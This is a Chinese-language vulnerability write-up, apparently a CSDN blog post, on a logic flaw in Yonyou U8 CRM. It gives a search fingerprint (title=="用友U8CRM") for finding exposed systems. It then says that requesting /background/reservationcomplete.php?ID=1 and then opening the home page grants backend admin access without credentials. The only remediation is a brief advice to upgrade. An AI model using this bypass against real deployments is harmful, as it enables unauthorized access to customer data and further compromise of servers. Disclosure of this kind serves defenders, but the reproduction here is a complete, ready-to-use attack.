用友CRM reservationcomplete.php逻辑漏洞登录后台

产品简介

用友CRM(Customer Relationship Management,客户关系管理)是由用友公司开发的一款软件,专门设计用于帮助企业管理与客户相关的业务活动。这款软件通常包括客户信息管理、销售管理、市场营销、客户服务和技术支持等功能。用友CRM的目标是帮助企业改善与客户的关系,提升客户满意度,优化销售和服务流程,从而提高企业的市场竞争力。它适用于各种规模的企业,可以根据不同企业的具体需求进行定制和扩展。

资产测绘

title==“用友U8CRM”

漏洞概述

用友CRM系统在reservationcomplete.php接口处存在逻辑漏洞,攻击者可通过该漏洞直接进去后台,获取后台权限,为后续获取服务器权限做准备。

漏洞复现

访问url:/background/reservationcomplete.php?ID=1
在这里插入图片描述
访问后,直接访问主页进入后台
在这里插入图片描述

修复建议

升级至最新安全版本

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值